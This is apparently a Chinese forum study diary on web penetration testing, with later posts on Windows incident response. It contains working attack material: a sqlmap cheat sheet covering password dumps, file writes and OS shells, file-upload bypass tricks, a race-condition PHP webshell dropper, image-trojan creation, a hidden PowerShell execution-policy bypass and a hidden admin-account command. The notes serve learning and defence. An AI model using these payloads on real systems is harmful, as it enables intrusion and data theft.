岑云木学习日记

岑云木

新年开新帖

岑云木

图片马：在同时存在图片和木马的文件夹下 搜索框输入cmd
在命令行窗口 输入copy x.png(jpg)/b+x.php(asp)  新生成的文件名.所有求文件后缀
ps: copy 1.png/b+2.asp  muma.png

手注入型后台猜解：
后台猜解
/robots.txt
admin
login
admin/login
admin.php
admin.aspx
admmn.asp
admin.jsp
login.html

xss: <meta http-equiv="refresh" content="5;url=http://www.baidu.com">

岑云木

union联合查询

查表

select group_concat(table_name) frominformation_schema.tables where table_schema=database()

b4bsql,geekuser

查列

select group_concat(column_name) frominformation_schema.columns where table_name='geekuser'

id,username,password

查数据

select group_concat(username) from geekuser

--------------------------------------------------------------
sqlmap
查当前用户：sqlmap.py-u http://www.xxxx.com --current-user

查当前数据库：sqlmap.py-u  http://www.xxxx.com --current-db

查所有表：sqlmap.py-u  http://www.xxxx.com -D 数据库名 --tables

查表中列：sqlmap.py-u  http://www.xxxx.com -D 数据库名 -T 表名 --columns

查表中数据：sqlmap.py-u  http://www.xxxx.com -D 数据库名 -T 表名 -C 列名1,列名2 --dump

岑云木

powershell
查看执行策略：Get-ExecutionPolicyget-executionpolicy
若出现restricted
管理员身份运行powerhsell然后执行命令：set-executionpolicy remotesigned  回车之后即可执行脚本。即可更改策略
本地权限绕过：
powershell.exe -executionpolicy bypass -file .\xx.ps1
本地隐藏绕过：
powershell.exe -executionpolicy bypass -windowstyle hidden -nologo -nonlnteractive -noprofile -file xx.ps1
``````````````````````````````````````````````````````````````````````````````````````````
文件上传绕过：
在console中，破坏函数/修改js添加白名单/删除js黑名单。
使用浏览器插件禁用js。
拦截数据包修改。如果能够拦截到数据包，说明已经通过前端检测了
.htaccess绕过
在Apache里，.htaccess是一个配置文件。它可以用来控制所在目录的访问权限以及解析设置。可以通过修改该文件的配置项，将该目录下的所有文件作为php文件来解析 .htaccess可以写入apache配置信息，改变当前目录以及子目录的apache配置信息(绕过方法：首先上传一个.htaccess文件，.htaccess文件内容如下。如果Apache允许.htaccess文件生效，并且.htaccess文件没有被重命名。那么就可以改变当前目录以及子目录的Apache配置信息，将其他后缀的文件作为PHP文件解析。)
后缀大小写绕过：
没有将文件后缀统一转换为大写或者是小写，而黑名单不严谨。
ps:php|.php5|.php4|.php3等一系列存在与于黑名单中
.user.ini
（服务器脚本语言为PHP，并且使用CGI/FastCGI模式，php版本>5.3.0，上传目录下要有可执行的php文件）
.user.ini，它会影响php.ini中的配置，从而将指定的文件内容按php来解析，影响的范围该文件所在的目录以及子目录。需要等待php.ini中的user_ini.cache_ttl设置的时间或重启Apache才能生效，且只在php5.3.0之后的版本才生效。.user.ini比.htaccess用的更广，不管是nginx/Apache/IIS,只要是以fastcgi运行的php都可以用这个办法。如果使用Apache，则用.htaccess文件有同样的效果。
注意：.htaccess只能用于Apache。
ps:可以上传一个这样的.user.ini:
auto_prepend_file = xxx.jpg
然后再上传一个图片马xxx.jpg:
<script language='php'>system('whoami');</script>
如果在上传目录中还有一个可执行的php文件，访问php文件，就达到了执行系统命令的效果(上传目录中有一个可执行的php文件，我们先上传一个.user.ini文件，这个文件的内容为auto_prepend_file=xxx.jpg。起到的作用相当于在可执行的php文件前插入图片马中的内容。然后图片马中的恶意代码也会被当做PHP解析。)
-------------------------------------
php.ini文件
（; Name for user-defined php.ini (.htaccess) files. Default is ".user.ini"
; 用户自定义的php.ini文件的名字，默认是.user.ini
user_ini.filename = ".user.ini"
​
; TTL for user-defined php.ini files (time-to-live) in seconds. Default is 300 seconds (5 minutes)
; 重新读取用户INI文件的时间间隔，默认是300秒（5分钟）
user_ini.cache_ttl = 300）

1337163122

发错贴了。。。。。

岑云木

sqlmap.py -u "http://www.xxx.com/xx.xxx?id=5"--dbs

//获取数据库

sqlmap.py -u "http://www.xxx.com/xx.xxx?id=5"--tables

//获取数据库的表名

sqlmap.py -u "http://www.xxx.com/xx.xxx?id=5"--current-db

//获取当前数据库名

sqlmap.py -u "http://www.xxx.com/xx.xxx?id=5"--current-user

//获取当前数据库的用户名

sqlmap.py -u "http://www.xxx.com/xx.xxx?id=5" -D security--tables

users

//获取指定数据库中的表名

sqlmap.py -u "" -D security -T users --columns

//获取指定表中的列名

sqlmap.py -u "http://www.xxx.com/xx.xxx?id=5"-D security -T users --columns --dump

//获取指定列名中的字段

总  结

常用语句：

sqlmap.py -u "[URL]"   或  sqlmap.py -r "[数据包_path]"

sqlmap.py -u "[URL]" –dbs    //获取数据库

sqlmap.py -u "[URL]" --current-db    //获取当前数据库名

sqlmap.py -u "[URL]" --current-user    //获取当前数据库的用户名

sqlmap.py -u "[URL]" --tables    //获取数据的所有表名

sqlmap.py -u "[URL]" --tables -D [数据库名]    //获取指定数据库中的所有表名

sqlmap.py -u "[URL]" --column -T [表名] -D [数据库名]    //获取指定表中的列字段

sqlmap.py -u "[URL]" --dump -C [列名] -T [表名] -D [数据库名]  //爆指定列中的字段

sqlmap.py -u "[URL]" --privileges     //查看当前数据库的用户权限

sqlmap.py -u "[URL]" --password    //爆数据库的密码

sqlmap.py -u "[URL]" --is-dba -v 1    //看有没有数据库管理员权限

读文件

        #--file-read="/etc/passwd"

        #--file-write="shell.php" --file-dest "/tmp/shell.php/"

        写入write本地路径的文件，dest到目标的绝对路径

设置前后缀

        --prefix    '%df%27'  -prefix      指定前缀

        --suffix    '-- l'              指定后缀

        --tamper    base64encode.py    过waf，使用base64编码替换

        sqlmap --purge          清除所有缓存

        --technique   B            注入测试时，指定布尔盲注

        --threads    5               多线程检索Image

*优先级最高，不需要-p参数

使用base64编码sql语句进行注入攻击

Image



--users  列出所有管理用户

--passwords 列出密码md5加密

--current-db 列出当前网站使用的数据库

--current-user列出当前网站用户

--level 5 在不确定是哪个参数为注入点时，使用更高的值

--is-dba查看当前用户是否为管理员

--roles列出数据库管理员角色，只适用于Oracle数据库

--identify-waf --batch 检测waf

-d "mysql://admin:admin@192.168.1.1:3306/testdb" --dbs

直接连接到数据库



--tamper参数速查表

--apostrophemask.py    将引号替换为UTF-8编码，过滤单引号

--base64encode.py        替换为base64编码

--multiplespaces.py        对关键字进行添加多个空格

--space2plus.py              用+号代替空格

--space2randomblank.py     将空格替换为其他有效字符

--unionalltounion.py       将UNION ALL SELECT替换为UNION SELECT

--space2hash.py               将空格替换为#号，并添加一个随机字符串或换行符

--space2mysqlblank.py    将空格替换为其他空符号

--space2mssqlhash.py      将空格替换为#号，并添加换行符

--between.py                    替换大于>号和=等于号



--os-cmd    执行 net user命令

--os-shell    交互式shell

--sql-shell    获得一个执行sql语句的shell

岑云木

1.sql注入：
   union注入、Boolean注入、报错注入、时间注入（时间盲注）、堆叠注入、二次注入、宽字节注入、cookie注入、base64注入、xff注入、
xss注入：跨站脚本攻击，针对网站应用程序的安全漏洞攻击，是代码注入的一种。
1）反射型：非持久性。
2）存储型：持久性XSS，永久保存在目标服务器的数据库

3）DOM型xss：document object model，特殊的反射型xss内容，结构及样式,只有HTML代码，不存在服务器端代码。所以程序不与服务器进行交互。


CSRF：跨站请求伪造，攻击者利用用户的身份，以目标用户的名义执行某些非法操作。


SSRF：服务端请求伪造，是一种由攻击者构造请求，由服务器端发起请求的安全漏洞。形成大多是由于服务端提供了其他服务器应用获取数据的功能且没有经过顾虑和限制。
SQL绕过：大小写绕过、双写绕过、编码绕过、内联绕过。

岑云木

文件上传：上传文件时，服务端未对客户端上传的文件进行严格的验证和过滤，就容易造成可以造成可以上传任意文件的漏洞。
      危害： 非法用户可以利用上传的恶意脚本文件控制整个网站，甚至服务器。这个恶意的文件，又被称为webshell，也可以将webshell称为一种网页后门。
      JS绕过：如果文件的后缀不被允许，则会弹框告知，此时上传文件的数据包并没有发送到服务器上，只是在客户端用Javascript对数据库进行检验（绕过方法：使用浏览器的插件删除检测文件后缀的js代码，然后上传文件即可绕过。修改文件后缀为可上传的文件，再抓包，修改执行文件的后缀即可上传成功）
   文件后缀绕过攻击：文件后缀绕过攻击是服务端代码中限制了某些后缀的文件不允许上传，但是有些APACHE是允许解析其他文件后缀（例如在http.con中，如果配置有如下代码，则可解析php和phtml文件，故可上传一个后缀为phtml的webshell，Addtype application/x-httpd-php  .php  .phtml）
   在apache中的解析顺序中，是由右向左解析文件后缀的，如果最右侧的后缀名不可识别，就继续往左判断，直到遇到可解析的文件后缀为止，故若有文件名类似1.php.xxx 因为xxx不可解析，所以向左解析后缀php。
   文件类型绕过：在客户端上传文件时，通过BP抓包，当上传一个php格式的文件时，可以看到数据包中content-type的值是：application-octet-stream，而上传jpg格式的文件时，数据包中content-type的值是：image/jpeg。所以，如果服务端代码是通过content-type的值来判断文件的类型，那么就存在绕过的可能，因为content-type的值通过客户端传递的是可以任意修改的，所以上传一个php文件时，在BP中将content-type的值修改为：image/jpeg，就可以绕过服务端的检测。
  在php中还存在一种相似的文件上传漏洞，php函数getimagesize可以获取图片的宽高、等信息，如果上传的不是图片文件，那么getimagesize就获取不到信息，则不允许上传（绕过方式：我们可以将图片和一个webshell脚本合并为一个文件，制作图片马。LR：Cat image.png  webshell.php > image.php 。此时getimagesize 就可以获取图片信息，且webshell的后缀是php也能被Apache解析为脚本文件。）
  文件截断：由于00代表结束符，所以会把00后面的所有字符删除。（条件： PHP版本小于5.3.4 ，php的magic_quotes_gpc为OFF状态）。
在上传文件时，服务端将GET参数jieduan的内容作为上传后文件的第一部分，然后将时间生成的图片文件名作为上传后的文件名的第二部分，此时修改参数jieduan为1.php%00.jpg，文件被保存在服务器时，%00会把“jpg”和按时间生成的图片文件名去全部截断，那么文件名就剩下1.php，因此成功上传webshell脚本。
  竞争条件攻击：一些网站上传文件的逻辑时先允许上传任意文件，然后检查上传的文件是否包含webshell的脚本，如果包含则删除该文件。这里存在的问题时文件上传成功后和删除文件之间存在一个短的时间差（因为要执行检查文件后和删除文件的操作），攻击者就可以利用这个时间差完成竞争条件的上传漏洞攻击（LR：攻击者先上传一个webshell脚本10.php， 内容为：<?php fputs (fopen('./shell.php','w'）,'<? php @eval($_POST[a])?>'); ?>  当10.php上传成功后，客户端立即访问10.php，则会在服务器短当前目录下生成一个shenll.php，这时攻击者就利用时间差完成了webshell的上传。

岑云木

文件分析-开机启动文件
一般情况下，各种木马、病毒等恶意程序，都会在计算机开机启动过程中自启动。
windows下可以通过以下三种方式查看开机启动项：
   1.利用操作系统中的启动菜单
   C:\Users\Ricardo\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
   2、利用系统配置msconfig
   3.利用注册表regedit
    计算机\HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
文件分析-temp临时异常文件
  temp（临时文件夹），位于C:\Doycments and Settings\Administrator\Local Settings 内。很多临时文件放在这里，用来收藏夹，浏览网页的临时文件，编辑文件等

使用运行 输入 %temp% 可直接打开临时文件夹

查看temp文件发现PE文件（exe、dll、sys），或者是否具有特别大的temp文件。

将文件上传到https://www.virustotal.com/进行查看 ，是否为恶意代码。
文件分析-浏览器信息分析
在被黑客拿下的服务器，很有可能会使用浏览器进行网站的访问。因此我们可以查看浏览器记录查看，探索浏览器是否被使用下载恶意代码。
浏览器浏览痕迹查看、浏览器文件下载记录查看（通过黑客自己搭建的网站下载各种脚本后门）、浏览器Cookie信息查看
文件分析-文件时间属性分析
在Windows系统下，文件属性的时间属性具有：创建时间、修改时间、访问时间（默认情况下禁用）（默认情况下，展示修改时间）
所以如果修改时间要早于创建时间那么这个文件存在很大问题，使用中国菜刀等工具修改的 修改时间，通过文件属性可以查看到创建时间，修改时间，访问时间。
文件分析-最近打开文件分析
windows系统中默认记录系统中最近打开使用的文件信息。
可以在目录Cocuments and Setting\Administrator\Recent 下查看 也可以运行下
%UserProfile%\Recent查看，然后利用windows中的筛选条件查看具体范围的文件

岑云木

进程分析-可疑进程发现与关闭
计算机与外部网络通信是建立在tcp或者UDP协议上的，并且每一次通信都是具有不同的端口（0~65535），如果计算机被木马后，肯定会与外部网络通信，那么此时就可以通过查看网络连接状态，找到对应的进程ID，然后关闭ID就可以关闭连接状态。
  .netstat -ano | find “ESTABLISHED” 查看网络建立连接状态
  .tasklist /svc |find "PID" 查看具体PID进程对应的程序
  .taskkill /PID pid值 /T 关闭进程
系统信息 -windows计划任务
  在计算机中可以通过设定计划任务，在固定时间执行固定操作。一般情况下，恶意代码也有可能在固定的时间设置执行。
   使用at命令可以对计划任务进行管理，直接输入at可以查看当前计算机中保存的计划任务。（也可在可视化的计划任务管理中进行）
系统信息-隐藏账号发现与删除
隐藏账号，是指“黑客”入侵之后为了能够持久保持对计算机访问，而在计算机中建立的不轻易被发现的计算机账号。
最为简单的隐藏账号建立：net user test$ test/add && net localgroup administrator test$/add 其中$符号可以导致系统管理员在使用 net user时无法查看到test$用户
恶意代码-发现与关闭
恶意代码在windows系统中运行过程中，将以进程的方式进行展示，其中恶意进程执行着各种恶意行为。
  对于可执行程序，可以直接使用杀毒软件进行查杀，但是并非所有的恶意程序能够被查杀。此时可以手动查杀，使用工具psexplore，然后利用virustotal.com进行分析，对恶意程序相关的服务进行关闭。
windows系统日志分析
windows审核策略设置
   开启审核策略，若日后系统出现故障、安全事故则可以查看系统的日志文件，排除故障，追查入侵者的信息等
   开始->管理工具->本地安全策略->本地策略->审核策略
  在windows系统中日志管理工具提供了筛选功能以方便用户进行查看。（不同类型的日志有不同的编号，每一种操作都有不同的日志ID）
  4624 --登录成功 4625--登陆失败 4634 --注销成功 4647--用户启动的注销 4672--使用超级用户（管理员）登陆